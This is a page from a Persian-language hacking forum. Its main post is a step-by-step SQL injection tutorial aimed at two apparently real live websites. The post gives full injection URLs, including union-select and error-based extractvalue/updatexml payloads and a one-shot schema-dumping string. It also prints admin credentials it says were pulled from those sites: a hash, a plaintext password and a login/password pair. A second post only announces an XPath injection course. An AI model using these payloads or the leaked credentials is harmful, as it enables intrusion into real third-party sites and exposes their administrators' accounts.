رفتن به مطلب
انجمن تیم امنیتی گارد ایران

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'hl'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

جستجو در ...

نمایش نتایجی که شامل ...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


Website URL


Yahoo


Skype


محل سکونت

  1. nonamee

    تارگت برای آموزش Sqlinjection

    ••.•´¯`•.•• به نام خدا ••.•`¯´•.•• با سلام خدمت کاربران محترم انجمن گاردایران تارگت اول برای آموزش -> شما برای پی بردن به وجود باگ SQL از چندین روش میتونید استفاده کنید روش اول بعد از عدد یا حرف میتونید هر یک از این علامت هارو قرار بدین ' یا '' یا \ بعد از قرار دادن هر یک از این علامت ها اگر هر گونه تغییر در سایت شدین احتمال زیاد سایت حاوی باگ هستش حالا عملیات برای سایت های مختلف فرق خواهد کرد که با چه زبانی نوشته شده ما فرض میکنیم با php نوشته شده برای پیدا کردن تارگت شما باید دورک نویسی را بلد باشید , اگر دورک نویسی بلد نباشید احتمال زیاد از تارگت هم خبری نیست من لیستی از دورک هارو واستون قرار میدم DORK.txtهر یک از دورک هارو در گوگل search کنید یادتون باشه اول دورک :inurl قرار بدید باگ SQLinjection نکات زیادی داره که سعی میکنم همه ی نکات را تقریبا خدمتتون عرض کنم ولی فعلا شما باید با نحوه ی کار آشنا بشید خب بریم سراغ تارگت اول http://musculoskeletalsociety.in/page.php?id=5 شما بعد از قرار دادن ' متوجه خواهید شد که سایت حاوی باگ است به همین ترتیب شما میتونید خیلی راحت version و تعداد ستون های سایت رو دربیارید http://musculoskeletalsociety.in/page.php?id=5 order by 99999-- 99999 که مشاهده میکنید یک عدد بزرگ هستش که شما به دلخواه میتونید وارد کنید این بدان معناست که ما با سایت صحبت میکنیم که آیا انقدر تعداد ستون دارد یا خیر ؟ اگر بعد از قرار دادن این عدد بزرگ سایت به طور کامل load شد این بدان معناست که سایت در گفتن حرف صحیح دریغ میکند پس باید بایپس آن را انجام دهیم بایپس این مورد به این شکل هستش http://musculoskeletalsociety.in/page.php?id=-5 order by 99999--+ در این حالت سایت دیگر load نمی شود چون دیگر اینقدر ستون ندارد ما تا جایی عدد 9999 را کم میکنیم که تا صفحه load شود که این بدان معناست تعداد ستون ها 5 عدد است http://musculoskeletalsociety.in/page.php?id=-5 order by 5--+ حال با دستور UNION SELECT 1,2,3,4,5 ستون هارو مشخص میکنیم http://musculoskeletalsociety.in/page.php?id=-5 union select 1,2,3,4,5--+ بعد از انجام مراحل بالا ستون ها مشخص میشود در صفحه عدد 2 و 3 مشخص شده است ما باید سعی کنیم عددی را انتخاب کنیم که از لحاظ سایز زیادی بزرگ نباشد برای مثال در اینجا عدد 2 دارای سایز بزرگتری نسبت به 3 هستش پس ما شروع به سوال پرسیدن از عدد 3 خواهیم کرد حال سوال پیش میاید چرا 2 را انتخاب نکنیم ؟ چون در استخراج اطلاعات مهم سایت مثلا user va pass به صورت حروف بزرگ نمایش داده میشود که ممکن است این حروف به صورت کوچک وارد سیستم شده اند برای فهمیدن version سایت کافی است شما ()version را به جای عدد 3 قرار دهید این نکته هم خدمتتون عرض کنم اگر جایی با گذاشتن ()version چیزی نمیایش داده نشد آن را بایپس کنید بدین صورت version@@ http://musculoskeletalsociety.in/page.php?id=-5 union select 1,2,version(),4,5--+ حال به سراغ بیرون کشید data base سایت خواهیم رفت بدین صورت با دستور http://musculoskeletalsociety.in/page.php?id=-5 union select 1,2,group_concat(table_name,0x3c62723e),4,5+from+information_schema.tables+where+table_schema=database()--+ اگر مشاهده کنید admin یک base مهم برای کار ماست آن را یاد داشت میکنیم و به صورت hex شده هم در میاوریم اگر نمیدونید چطور به صورت hex دربیارید چون باید به زبان سایت admin را تبدیل کنید یک برنامه قرار میدم برای راحتی کارتون CharConversion.rarپسورد ---> guardiran.org admin = 0x61646d696e اینو یادتون باشه حتما قبل 61646d696e ---> 0x قرار دهید دستور بدین صورت است http://musculoskeletalsociety.in/page.php?id=-5%20union%20select%201,2,group_concat(column_name,0x3c62723e),4,5+from+information_schema.columns+where+table_name=0x61646d696e--+ بعد از مشخص شدن table های مهم آن ها را در دستور زیر وارد کنید group_concat(user,0x3a,password)+from+ Hex kardim http://musculoskeletalsociety.in/page.php?id=-5%20union%20select%201,2,group_concat(user_id,0x3a,password,0x3c62723e),4,5+from+admin--+ به همین راحتی username : admin password : 25a41cec631264f04815eda23dc6edd9 password : vizag@123 سعی کردم تارگتی رو انتخاب کنم که به راحتی بتونید یاد بگیرید دستورات رو نکته : دستوری رو میتونم یادتون بدم که در خیلی موارد جواب میده و اصلا نیاز نیست زمان زیادی برای پیدا کردن database یا table صرف کنید شما فقط کافی در قسمت ستون آسیب پذیر این دستور رو وارد کنید (select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a) به همین راحتی تمام جزئیات مشخص خواهد شد تارگت شماره ی 2 ----------> http://www.belbana.com شما خیلی راحت میتونید با دورک نویسی صفحه ای رو پیدا کنید برای وارد کرد دستورات مثلا در گوگل بدین صورت search میکنید site:"http://www.belbana.com" inurl:"id=" http://www.belbana.com/our-products-detail.php?id=1 فرضا این صفحه رو انتخاب کردیم و دستورات را وارد میکنیم با وارد کردن ' متوجه میشیم که سایت دارای تغییر است و Error میدهد پس سایت باگ SQLinjection دارد حال دستورات را وارد میکنیم http://www.belbana.com/our-products-detail.php?id=1 order by 999999-- بعد از آن فهمیدیم که تعداد ستون های سایت 7 تا است بدین طریق عمل میکنیم http://www.belbana.com/our-products-detail.php?id=1%20union%20select%201,2,3,4,5,6,7-- ولی بعد از وارد کردن این دستورات یک Error معروف به میدهد The used SELECT statements have a different number of columns زمانی که با این Error مواجع شدید باید از بایپس استفاده کنید اگر بایپس هم جوابگو نداد باید از متد Xpath injection استفاده کنید متد xpath injection برای به دست آوردن version در این متد شما باید بدین طریق عمل کنید با این دستور +and+extractvalue(rand(),concat(0x7e,version()))-- or +and+updatexml(null,concat(0x3a,version()),null)-- بعد از وارد کردن http://www.belbana.com/our-products-detail.php?id=1+and+extractvalue(rand(),concat(0x7e,version()))-- version مشخص میشود XPATH syntax error: '~5.5.62-38.14-log' به همین راحتی حالا باتوجه به دستورات xpath injection برای به دست آوردن data base سایت عمل میکنیم بدین روش +and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+limit+0,1)))-- که با زیاد کردن عدد 0 میتونید database رامشخص کنید ولی برای راحتی کار شما یک متد محدود سازی شده قرار میدم که میتونید استفاده کنید که زمانتون از دست نره بدین روش +and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))-- حال دستورات را وارد کنید بدین طریق http://www.belbana.com/our-products-detail.php?id=1+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))-- مشاهده میکنید که با خوش شانسی اول admin پدیدار میشود بسیار خب حال برای فهمیدن چه چیزی درون ادمین است از این روش استفاده میکنیم فقط قبلش باید admin رو به صورت hex شده دربیارید admin = 0x61646d696e +and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=name table hex masalan admin+limit+0,1)))-- بسیار خب حالا دستور بالا را وارد میکنیم www.belbana.com/our-products-detail.php?id=1+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=0x61646d696e+limit+0,1)))-- بسیار خب حالا عدد صفر را به ترتیب زیاد کنید مشاهده میکنید که XPATH syntax error: '~id' XPATH syntax error: '~login' XPATH syntax error: '~paswoord' نمایش داده میشود انقدر عدد را افزایش میدید که دیگر چیزی نمایش داده نشود حالا با دستور زیاد اطلاعات رو بیرون میکشیم +and+extractvalue(rand(),concat(0x7e,(select+concat(login,0x7e,paswoord)+from+admin+limit+0,1)))-- XPATH syntax error: '~belbana~3AMGz4dfNRUteaZfbeng' سعی میکنم در روز های آینده تارگت و آموزش رو باهم قرار بدم همراه با بایپس های خاص امیدوارم موفید واقع شده باشه با تشکر
  2. P0S3ID0N

    آموزش حملات Xpath Injection

    به نام خدا در این سری آموزش ها، ابتدا توضیحاتی راجع به زبانXML داده می شود، سپس در ادامه به بررسی(XPath) XML Path language در XML میپردازیم و درنهایت به صورت عملی روش ها و تکنیک های Xpath Injection رو توضیح می دهیم. این آموزش در 3 قسمت ارایه می شود: قسمت اول آموزش قسمت دوم آموزش قسمت سوم آموزش دوستانی که سوال، نظر یا پیشنهادی در مورد آموزش ها دارند در بخش سوال و جواب های انجمن مطرح کنند. موفق باشید GUARDIRAN SECURITY TEAM

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...